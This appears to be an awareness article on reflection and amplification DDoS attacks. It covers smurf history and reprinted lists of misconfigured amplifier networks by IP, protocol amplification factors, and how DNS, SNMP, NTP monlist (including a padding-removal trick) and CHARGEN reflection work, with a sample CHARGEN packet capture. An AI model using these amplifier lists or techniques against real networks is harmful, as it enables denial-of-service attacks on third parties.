Massive Distributed Reflection Denial of Service (DrDoS) DoSNETs for hire – NTP, Chargen, SNMP, SSDP

DDoS attacks with a few thousand infected windows PCs SYN flooding a network have been taking a back seat to the next generation of Denial of Service attacks, known as Distributed Reflection Denial of Service (DrDoS) attacks. A packet kiddie doesn’t even need to compromise servers and PCs anymore to launch an attack. Many of the administrators of the servers being utilized in the attacks have little awareness they are partaking in an attack. Reflection attacks actually are not something new to the world of network security, you may have heard of the original amplification attack “smurf”.  In a smurf attack large numbers of Internet Control Message Protocol (ICMP) packets with the intended victim’s spoofed source IP are broadcast to a computer network using an IP Broadcast address. Most devices on a network would, by default, respond to this by sending a reply to the source IP address. This attack was so devastating that several non-profit organizations began making awareness of the issue, one in particular was netscan.org which when began published over 122,945 misconfigured networks that would respond to spoofed ICMP echo request, by 2005 the number was down to a few thousand with minimal responses from each network.

Here is a snapshot of what the internet looked like in early 2000, the chart below shows the broadcast address and the amount of times it will respond to a single ping request:

Last rescan: Thu Feb 24 10:15:39 PST 2000

 

RESP      ADDR               EMAIL ADDRESSES

———————————————————————

124273    208.158.191.0

27545     210.45.224.255

12501     193.76.71.0

10679     202.178.229.0

10483     200.255.9.0

9818      210.72.81.0

9617      207.34.70.0

8176      207.112.112.0

7222      207.112.112.255

6681      206.130.55.0

6316      206.130.55.255

6003      210.243.91.255

5358      208.192.16.255

4658      209.132.220.255

4413      206.144.34.255

4207      206.144.35.255

3146      207.34.70.255

2418      170.118.254.0

2416      170.118.254.255

 

And a snapshot as of today from Powertech.no who has kept Netscan’s operation going:

Current top ten smurf amplifiers (updated every 5 minutes)
(last update: 2015-08-09 20:01:02 CET)

Network             #Dups  #Incidents  Registered at     Home AS

212.1.130.0/24         38           0  1999-02-20 09:41  AS9105

204.158.83.0/24        27           0  1999-02-20 10:09  AS3354

209.241.162.0/24       27           0  1999-02-20 08:51  AS701

159.14.24.0/24         20           0  1999-02-20 09:39  AS2914

192.220.134.0/24       19           0  1999-02-20 09:38  AS685

204.193.121.0/24       19           0  1999-02-20 08:54  AS701

198.253.187.0/24       16           0  1999-02-20 09:34  AS22

164.106.163.0/24       14           0  1999-02-20 10:11  AS7066

12.17.161.0/24         13           0  2000-11-29 19:05  not-analyzed

199.98.24.0/24         13           0  1999-02-18 11:09  AS6199

 

Netscan offered a script that checked the number of times that x.y.z.0 and x.y.z.255 reply to a single ping packet. If either number is greater than 1, the network is misconfigured and its administrator should be notified. Networks responding more than 10 times per ping were likely to be used in smurf broadcast amplifier lists. Netscan shut its doors after helping to eliminate the number of available networks to be abused in smurf attacks. Some organizations criticized Netscan for publishing the lists of networks being used in attacks (an attacker could simply copy the vulnerable networks into a list and use them in an attack) but they will always be remembered as the ones who saved the internet.

 

In today’s world there are a whole new set of protocols that can be abused in reflection attacks. A snapshot of 2015 with the protocol and amplification factor charted below:

 

UDP-based Amplification Attacks Protocol Bandwidth Amplification Factor NTP 556.9 CharGen 358.8 DNS up to 179 QOTD 140.3 Quake Network Protocol 63.9 SSDP 30.8 Kad 16.3 SNMPv2 6.3 Steam Protocol 5.5 NetBIOS 3.8 BitTorrent 3.8

 

There are no organizations publishing lists of known misconfigured protocols these days as that might result in lawsuits and jail time as denial of service attacks are not taken lightly anymore.

DNS amplification attacks:

1. This type of attack takes advantage of open or misconfigured DNS servers that respond to outside recursive DNS queries. In this type of attack it does not matter if the nameserver is authoritative or not, the DNS servers will respond to any queries regardless. In a reflection attack the attackers have the ability to create a TXT record attack which will associate arbitrary and non-formatted text to a domain or host to amplify the size of the response.
2. Reflection/Amplification based on authoritative or non-authoritative name servers. If the nameserver is an authoritative name server for the domain being queried. The attacker issues a DNS ANY query which retrieves all cached records available for the domain name and the attacker spoofs the reply to be sent to the victim. Furthermore, RFC 2671 makes it possible to increase the buffer size of the request. If the requestor-side specification of the maximum buffer size is changed responders can be made to send messages which are too large for intermediate gateways to forward thus leading to potential ICMP storms between gateways and responders.
3. An “A record attack” occurs when an attacker issues multiple queries for A records to victim DNS servers, the request have malformed domain names so the DNS server responds with registry code or RCODE. Large numbers of these queries from a large number of sources can create devastating results.

Simple Network Management Protocol (SNMP) DrDoS attacks

SNMP operates at layer seven (application layer) to manage devices such as routers, switches, VoIP, video systems and other devices. SNMP will transmit data about the devices it has records for and can even be used to manage some devices. SNMP is broken into three parts, the device, the agent which are software modules that are within the devices and collect various info and the management software which does just like you’d think, maintains and manages records for all devices it manages.

 

SNMP uses UDP port 161 to transmit messages and 162 to catch or “trap” messages. There are three versions of SNMP, v1,v2 and v3. SNMPv2 and v3 use additional protocol data units which are “GetBulkRequest” and “InformRequest”. Since SNMP is transmitted using UDP, IP address spoofing is possible as it is a stateless protocol.

 

The DrDoS is performed after an attacker scans the internet for SNMP hosts and their community strings. Using this information the attacker can send a BulkGetRequest which is around 100 bytes and the response from the SNMP server is around 400 bytes an amplification ratio around 1:4. Attackers can also use the GetBulkRequest and enumerate all the Management Information Bases (MIBs) which can increase the amplification ratio to around 1:7 making it far more efficient for DrDoS attacks.

 

Network Time Protocol (NTP) DrDoS attacks

NTP uses UDP port 123 to synchronize computer time clocks, specifically network clocks using a set of clients and servers. Attackers scan and build a database of NTP servers that respond to outside request (they should be ACL’d to prevent abuse). The attacker issues an NTP mode 7 command which request a “monlist” which is a function built into the protocol for monitoring. There is a packet size minimum set fourth in the RFC which returns a more even response for the request. Attackers can circumvent this restriction by removing the padding from the request allowing them to issue the monlist request with a much smaller request. The request without padding was calculated at 60 bytes while the response returned 2604 bytes giving this attack a whopping reflection multiplier of 43:1.

 

Character Generator Protocol (CHARGEN) DrDoS attacks

CHARGEN uses TCP and UDP, the TCP generator service is not vulnerable to amplification attacks as the connection is oriented. The UDP based CHARGEN service listens on port 19 for incoming datagrams, when one is received the server answers with a random number of characters between zero and 512. This means the attacker will not be able to always successfully amplify the response but more often than not it will be. Open source information estimates an average reflection multiplier of about 17.

 

Here is an actual example of what a CHARGEN attack looks like in a packet:

2015-04-16 06:17:16.392098 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443

.>..E…26..q……”…..-$c..w

!”#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefg

!”#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefgh

“#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghi

#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghij

$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijk

%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijkl

 

2015-04-16 06:17:16.393881 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443

.>..E…27..q……”…..-$c..w

!”#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefg

!”#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefgh

“#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghi

#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghij

$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijk

%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijkl

 

2015-04-16 06:17:16.398694 IP 180.189.3.34.61997 > 192.168.1.103.9315: UDP, length 443

.>..E…2<..q……”…..-$c..w

!”#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefg

!”#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefgh

“#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghi

#$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghij

$%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijk

%&'()*+,-./0123456789:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijkl

 

 

In the wild there have been reports of NTP DoSNETs attacking with over 100GB/S, SNMP DoSNETs capable of 40 GB/S, DNS attacks at 10 GB/S, CHARGEN DoSNETs at about 20MB/S. If one attacker or group of attackers can leverage all of these types of attacks at the same time it would be devastating to virtually any server on the net. Currently, you can buy or rent these DoSNETs on the hacker underground forums and IRC channels for as little as $5 for a 30 minute attack.